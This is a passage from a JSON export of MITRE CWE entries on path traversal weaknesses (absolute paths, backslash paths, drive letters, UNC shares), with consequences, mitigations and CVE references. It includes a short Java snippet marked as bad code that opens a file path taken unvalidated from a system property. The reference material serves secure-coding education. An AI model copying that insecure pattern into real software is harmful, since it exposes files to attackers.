directory.","Extended_Description":"This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"22","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"22","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"22","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries."},{"Scope":"Integrity","Impact":"Modify Files or Directories","Note":"The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication."},{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-18"},"Intro_Text":"In the example below, the path to a dictionary file is read from a system property and used to initialize a File object.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String filename = System.getProperty(\\"com.domain.application.dictionaryFile\\");File dictionaryFile = new File(filename);","xhtml:br":""}},"Body_Text":"However, the path is not validated or modified to prevent it from containing relative or absolute path sequences before creating the File object. This allows anyone who can control the system property to determine what file is used. Ideally, the path should be resolved relative to some kind of application or user home directory."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1345","Description":"Multiple FTP clients write arbitrary files via absolute paths in server responses","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1345"},{"Reference":"CVE-2001-1269","Description":"ZIP file extractor allows full path","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1269"},{"Reference":"CVE-2002-1818","Description":"Path traversal using absolute pathname","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1818"},{"Reference":"CVE-2002-1913","Description":"Path traversal using absolute pathname","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1913"},{"Reference":"CVE-2005-2147","Description":"Path traversal using absolute pathname","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2147"},{"Reference":"CVE-2000-0614","Description":"Arbitrary files may be overwritten via compressed attachments that specify absolute path names for the decompressed output.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0614"},{"Reference":"CVE-1999-1263","Description":"Mail client allows remote attackers to overwrite arbitrary files via an e-mail message containing a uuencoded attachment that specifies the full pathname for the file to be modified.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1263"},{"Reference":"CVE-2003-0753","Description":"Remote attackers can read arbitrary files via a full pathname to the target file in config parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0753"},{"Reference":"CVE-2002-1525","Description":"Remote attackers can read arbitrary files via an absolute pathname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1525"},{"Reference":"CVE-2001-0038","Description":"Remote attackers can read arbitrary files by specifying the drive letter in the requested URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0038"},{"Reference":"CVE-2001-0255","Description":"FTP server allows remote attackers to list arbitrary directories by using the \\"ls\\" command and including the drive letter name (e.g. C:) in the requested pathname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0255"},{"Reference":"CVE-2001-0933","Description":"FTP server allows remote attackers to list the contents of arbitrary drives via a ls command that includes the drive letter as an argument.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0933"},{"Reference":"CVE-2002-0466","Description":"Server allows remote attackers to browse arbitrary directories via a full pathname in the arguments to certain dynamic pages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0466"},{"Reference":"CVE-2002-1483","Description":"Remote attackers can read arbitrary files via an HTTP request whose argument is a filename of the form \\"C:\\" (Drive letter), \\"//absolute/path\\", or \\"..\\" .","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1483"},{"Reference":"CVE-2004-2488","Description":"FTP server read/access arbitrary files using \\"C:\\\\\\" filenames","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2488"},{"Reference":"CVE-2001-0687","Description":"FTP server allows a remote attacker to retrieve privileged web server system information by specifying arbitrary paths in the UNC format (\\\\\\\\computername\\\\sharename).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0687"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Absolute Path Traversal"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"597"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Filenames and Paths&#34;, Page 503"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"37":{"attr":{"@_ID":"37","@_Name":"Path Traversal: \'/absolute/pathname/here\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A software system that accepts input in the form of a slash absolute path (\'/absolute/pathname/here\') without appropriate validation can allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"36","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"160","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1345","Description":"Multiple FTP clients write arbitrary files via absolute paths in server responses","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1345"},{"Reference":"CVE-2001-1269","Description":"ZIP file extractor allows full path","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1269"},{"Reference":"CVE-2002-1818","Description":"Path traversal using absolute pathname","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1818"},{"Reference":"CVE-2002-1913","Description":"Path traversal using absolute pathname","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1913"},{"Reference":"CVE-2005-2147","Description":"Path traversal using absolute pathname","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2147"},{"Reference":"CVE-2000-0614","Description":"Arbitrary files may be overwritten via compressed attachments that specify absolute path names for the decompressed output.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0614"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"/absolute/pathname/here"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO05-C","Entry_Name":"Identify files using multiple file attributes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Slash Absolute Path - /absolute/pathname/here","attr":{"@_Date":"2008-04-11"}}}},"38":{"attr":{"@_ID":"38","@_Name":"Path Traversal: \'\\\\absolute\\\\pathname\\\\here\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A software system that accepts input in the form of a backslash absolute path (\'\\\\absolute\\\\pathname\\\\here\') without appropriate validation can allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"36","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1263","Description":"Mail client allows remote attackers to overwrite arbitrary files via an e-mail message containing a uuencoded attachment that specifies the full pathname for the file to be modified.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1263"},{"Reference":"CVE-2003-0753","Description":"Remote attackers can read arbitrary files via a full pathname to the target file in config parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0753"},{"Reference":"CVE-2002-1525","Description":"Remote attackers can read arbitrary files via an absolute pathname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1525"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\\\\absolute\\\\pathname\\\\here (\'backslash absolute path\')"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO05-C","Entry_Name":"Identify files using multiple file attributes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Backslash Absolute Path - \\\\absolute\\\\pathname\\\\here","attr":{"@_Date":"2008-04-11"}}}},"39":{"attr":{"@_ID":"39","@_Name":"Path Traversal: \'C:dirname\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"An attacker can inject a drive letter or Windows volume letter (\'C:dirname\') into a software system to potentially redirect access to an unintended location or arbitrary file.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"36","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries."},{"Scope":"Integrity","Impact":"Modify Files or Directories","Note":"The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication."},{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0038","Description":"Remote attackers can read arbitrary files by specifying the drive letter in the requested URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0038"},{"Reference":"CVE-2001-0255","Description":"FTP server allows remote attackers to list arbitrary directories by using the \\"ls\\" command and including the drive letter name (e.g. C:) in the requested pathname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0255"},{"Reference":"CVE-2001-0687","Description":"FTP server allows a remote attacker to retrieve privileged system information by specifying arbitrary paths.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0687"},{"Reference":"CVE-2001-0933","Description":"FTP server allows remote attackers to list the contents of arbitrary drives via a ls command that includes the drive letter as an argument.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0933"},{"Reference":"CVE-2002-0466","Description":"Server allows remote attackers to browse arbitrary directories via a full pathname in the arguments to certain dynamic pages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0466"},{"Reference":"CVE-2002-1483","Description":"Remote attackers can read arbitrary files via an HTTP request whose argument is a filename of the form \\"C:\\" (Drive letter), \\"//absolute/path\\", or \\"..\\" .","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1483"},{"Reference":"CVE-2004-2488","Description":"FTP server read/access arbitrary files using \\"C:\\\\\\" filenames","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2488"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'C:dirname\' or C: (Windows volume or \'drive letter\')"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO05-C","Entry_Name":"Identify files using multiple file attributes"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Drive Letter or Windows Volume - \'C:dirname\'","attr":{"@_Date":"2008-04-11"}}}},"40":{"attr":{"@_ID":"40","@_Name":"Path Traversal: \'\\\\\\\\UNC\\\\share\\\\name\\\\\' (Windows UNC Share)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"An attacker can inject a Windows UNC share (\'\\\\\\\\UNC\\\\share\\\\name\') into a software system to potentially redirect access to an unintended location or arbitrary file.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"36","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that 